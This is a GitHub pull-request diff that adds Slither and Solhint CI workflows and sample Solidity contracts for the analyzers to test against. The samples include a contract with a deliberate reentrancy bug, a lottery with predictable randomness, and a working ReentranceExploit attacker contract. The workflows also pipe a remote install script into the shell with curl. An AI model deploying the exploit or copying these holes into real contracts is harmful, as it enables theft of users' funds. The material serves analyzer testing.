-
Notifications
You must be signed in to change notification settings - Fork 43
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #1 from eshaan-deepsource/add-solidity-vyper
add Solidity and Vyper files for Slither and Solhint analyzers
- Loading branch information
Showing
32 changed files
with
1,079 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
# ref: https://github.com/crytic/slither-action#how-to-use-1 | ||
# A copy-paste Github Actions config to run Slither and report the artifact to DeepSource | ||
name: Slither Analysis | ||
|
||
on: | ||
# Note that both `push` and `pull_request` triggers should be present for GitHub to consistently present slither | ||
# SARIF reports. | ||
push: | ||
branches: [main, master] | ||
pull_request: | ||
|
||
jobs: | ||
scan: | ||
runs-on: ubuntu-latest | ||
permissions: | ||
contents: read | ||
security-events: write | ||
env: | ||
DEEPSOURCE_DSN: ${{ secrets.DEEPSOURCE_DSN }} | ||
steps: | ||
- uses: actions/checkout@v3 | ||
with: | ||
ref: ${{ github.event.pull_request.head.sha }} | ||
|
||
- name: Run Slither | ||
uses: crytic/[email protected] | ||
id: slither | ||
with: | ||
slither-version: 0.10.0 | ||
target: "solidity/" | ||
# The following makes slither produce scan analysis in SARIF format | ||
sarif: ./slither.sarif | ||
# The following line prevents aborting the workflow immediately in case your files fail Slither checks. | ||
# This allows the following upload-sarif action to still upload the results. | ||
continue-on-error: true | ||
|
||
- name: Upload SARIF report files to DeepSource | ||
id: upload-sarif | ||
run: | | ||
# Install the CLI | ||
curl https://deepsource.io/cli | sh | ||
# Send the report to DeepSource | ||
./bin/deepsource report --analyzer slither --analyzer-type community --value-file ${{ steps.slither.outputs.sarif }} | ||
# Ensure the workflow eventually fails if files did not pass slither checks. | ||
- name: Verify slither-action succeeded | ||
shell: bash | ||
run: | | ||
echo "If this step fails, slither found issues. Check the output of the scan step above." | ||
[[ "${{ steps.slither.outcome }}" == "success" ]] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,56 @@ | ||
# A Github Actions config to run Solhint and report the artifact to DeepSource | ||
name: Solhint Analysis | ||
|
||
on: | ||
# Note that both `push` and `pull_request` triggers should be present for GitHub to consistently present solhint | ||
# SARIF reports. | ||
push: | ||
branches: [main, master] | ||
pull_request: | ||
|
||
jobs: | ||
scan: | ||
runs-on: ubuntu-latest | ||
permissions: | ||
contents: read | ||
security-events: write | ||
env: | ||
DEEPSOURCE_DSN: ${{ secrets.DEEPSOURCE_DSN }} | ||
steps: | ||
- uses: actions/checkout@v4 | ||
with: | ||
ref: ${{ github.event.pull_request.head.sha }} | ||
|
||
- uses: actions/setup-node@v4 | ||
with: | ||
node-version: "16" | ||
cache: npm | ||
|
||
- name: Install solhint | ||
run: | | ||
npm install solhint@^4.1.1 | ||
- name: Run solhint | ||
id: solhint | ||
run: | | ||
cd solidity | ||
npx solhint '*.sol' -f sarif > solhint.sarif | ||
# The following line prevents aborting the workflow immediately in case your files fail solhint checks. | ||
# This allows the following upload-sarif action to still upload the results. | ||
continue-on-error: true | ||
|
||
- name: Upload SARIF report files to DeepSource | ||
id: upload-sarif | ||
run: | | ||
# Install the CLI | ||
curl https://deepsource.io/cli | sh | ||
# Send the report to DeepSource | ||
./bin/deepsource report --analyzer solhint --analyzer-type community --value-file solidity/solhint.sarif | ||
# Ensure the workflow eventually fails if files did not pass solhint checks. | ||
- name: Verify solhint succeeded | ||
shell: bash | ||
run: | | ||
echo "If this step fails, solhint found issues. Check the output of the scan step above." | ||
[[ "${{ steps.solhint.outcome }}" == "success" ]] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
{ | ||
"extends": "solhint:all" | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,18 @@ | ||
|
||
pragma solidity ^0.4.15; | ||
|
||
contract Alice { | ||
int public val; | ||
|
||
function set(int new_val){ | ||
val = new_val; | ||
} | ||
|
||
function set_fixed(int new_val){ | ||
val = new_val; | ||
} | ||
|
||
function(){ | ||
val = 1; | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
|
||
pragma solidity ^0.4.15; | ||
|
||
contract Alice { | ||
function set(uint); | ||
function set_fixed(int); | ||
} | ||
|
||
contract Bob { | ||
function set(Alice c){ | ||
c.set(42); | ||
} | ||
|
||
function set_fixed(Alice c){ | ||
c.set_fixed(42); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,97 @@ | ||
/* | ||
* This is a distributed lottery that chooses random addresses as lucky addresses. If these | ||
* participate, they get the jackpot: 7 times the price of their bet. | ||
* Of course one address can only win once. The owner regularly reseeds the secret | ||
* seed of the contract (based on which the lucky addresses are chosen), so if you did not win, | ||
* just wait for a reseed and try again! | ||
* | ||
* Jackpot chance: 1 in 8 | ||
* Ticket price: Anything larger than (or equal to) 0.1 ETH | ||
* Jackpot size: 7 times the ticket price | ||
* | ||
* HOW TO PARTICIPATE: Just send any amount greater than (or equal to) 0.1 ETH to the contract's address | ||
* Keep in mind that your address can only win once | ||
* | ||
* If the contract doesn't have enough ETH to pay the jackpot, it sends the whole balance. | ||
*/ | ||
|
||
contract OpenAddressLottery{ | ||
struct SeedComponents{ | ||
uint component1; | ||
uint component2; | ||
uint component3; | ||
uint component4; | ||
} | ||
|
||
address owner; //address of the owner | ||
uint private secretSeed; //seed used to calculate number of an address | ||
uint private lastReseed; //last reseed - used to automatically reseed the contract every 1000 blocks | ||
uint LuckyNumber = 7; //if the number of an address equals 7, it wins | ||
|
||
mapping (address => bool) winner; //keeping track of addresses that have already won | ||
|
||
function OpenAddressLottery() { | ||
owner = msg.sender; | ||
reseed(SeedComponents((uint)(block.coinbase), block.difficulty, block.gaslimit, block.timestamp)); //generate a quality random seed | ||
} | ||
|
||
function participate() payable { | ||
if(msg.value<0.1 ether) | ||
return; //verify ticket price | ||
|
||
// make sure he hasn't won already | ||
require(winner[msg.sender] == false); | ||
|
||
if(luckyNumberOfAddress(msg.sender) == LuckyNumber){ //check if it equals 7 | ||
winner[msg.sender] = true; // every address can only win once | ||
|
||
uint win=msg.value*7; //win = 7 times the ticket price | ||
|
||
if(win>this.balance) //if the balance isnt sufficient... | ||
win=this.balance; //...send everything we've got | ||
msg.sender.transfer(win); | ||
} | ||
|
||
if(block.number-lastReseed>1000) //reseed if needed | ||
reseed(SeedComponents((uint)(block.coinbase), block.difficulty, block.gaslimit, block.timestamp)); //generate a quality random seed | ||
} | ||
|
||
function luckyNumberOfAddress(address addr) constant returns(uint n){ | ||
// calculate the number of current address - 1 in 8 chance | ||
n = uint(keccak256(uint(addr), secretSeed)[0]) % 8; | ||
} | ||
|
||
function reseed(SeedComponents components) internal { | ||
secretSeed = uint256(keccak256( | ||
components.component1, | ||
components.component2, | ||
components.component3, | ||
components.component4 | ||
)); //hash the incoming parameters and use the hash to (re)initialize the seed | ||
lastReseed = block.number; | ||
} | ||
|
||
function kill() { | ||
require(msg.sender==owner); | ||
|
||
selfdestruct(msg.sender); | ||
} | ||
|
||
function forceReseed() { //reseed initiated by the owner - for testing purposes | ||
require(msg.sender==owner); | ||
|
||
SeedComponents s; | ||
s.component1 = uint(msg.sender); | ||
s.component2 = uint256(block.blockhash(block.number - 1)); | ||
s.component3 = block.difficulty*(uint)(block.coinbase); | ||
s.component4 = tx.gasprice * 7; | ||
|
||
reseed(s); //reseed | ||
} | ||
|
||
function () payable { //if someone sends money without any function call, just assume he wanted to participate | ||
if(msg.value>=0.1 ether && msg.sender!=owner) //owner can't participate, he can only fund the jackpot | ||
participate(); | ||
} | ||
|
||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
pragma solidity ^0.4.15; | ||
|
||
contract Reentrance { | ||
mapping (address => uint) userBalance; | ||
|
||
function getBalance(address u) constant returns(uint){ | ||
return userBalance[u]; | ||
} | ||
|
||
function addToBalance() payable{ | ||
userBalance[msg.sender] += msg.value; | ||
} | ||
|
||
function withdrawBalance(){ | ||
// send userBalance[msg.sender] ethers to msg.sender | ||
// if mgs.sender is a contract, it will call its fallback function | ||
if( ! (msg.sender.call.value(userBalance[msg.sender])() ) ){ | ||
throw; | ||
} | ||
userBalance[msg.sender] = 0; | ||
} | ||
|
||
function withdrawBalance_fixed(){ | ||
// to protect against re-entrancy, the state variable | ||
// has to be change before the call | ||
uint amount = userBalance[msg.sender]; | ||
userBalance[msg.sender] = 0; | ||
if( ! (msg.sender.call.value(amount)() ) ){ | ||
throw; | ||
} | ||
} | ||
|
||
function withdrawBalance_fixed_2(){ | ||
// send() and transfer() are safe against reentrancy | ||
// they do not transfer the remaining gas | ||
// and they give just enough gas to execute few instructions | ||
// in the fallback function (no further call possible) | ||
msg.sender.transfer(userBalance[msg.sender]); | ||
userBalance[msg.sender] = 0; | ||
} | ||
|
||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
pragma solidity ^0.4.15; | ||
|
||
contract ReentranceExploit { | ||
bool public attackModeIsOn=false; | ||
address public vulnerable_contract; | ||
address public owner; | ||
|
||
function ReentranceExploit() public{ | ||
owner = msg.sender; | ||
} | ||
|
||
function deposit(address _vulnerable_contract) public payable{ | ||
vulnerable_contract = _vulnerable_contract ; | ||
// call addToBalance with msg.value ethers | ||
require(vulnerable_contract.call.value(msg.value)(bytes4(sha3("addToBalance()")))); | ||
} | ||
|
||
function launch_attack() public{ | ||
attackModeIsOn = true; | ||
// call withdrawBalance | ||
// withdrawBalance calls the fallback of ReentranceExploit | ||
require(vulnerable_contract.call(bytes4(sha3("withdrawBalance()")))); | ||
} | ||
|
||
|
||
function () public payable{ | ||
// atackModeIsOn is used to execute the attack only once | ||
// otherwise there is a loop between withdrawBalance and the fallback function | ||
if (attackModeIsOn){ | ||
attackModeIsOn = false; | ||
require(vulnerable_contract.call(bytes4(sha3("withdrawBalance()")))); | ||
} | ||
} | ||
|
||
function get_money(){ | ||
suicide(owner); | ||
} | ||
|
||
} |
Oops, something went wrong.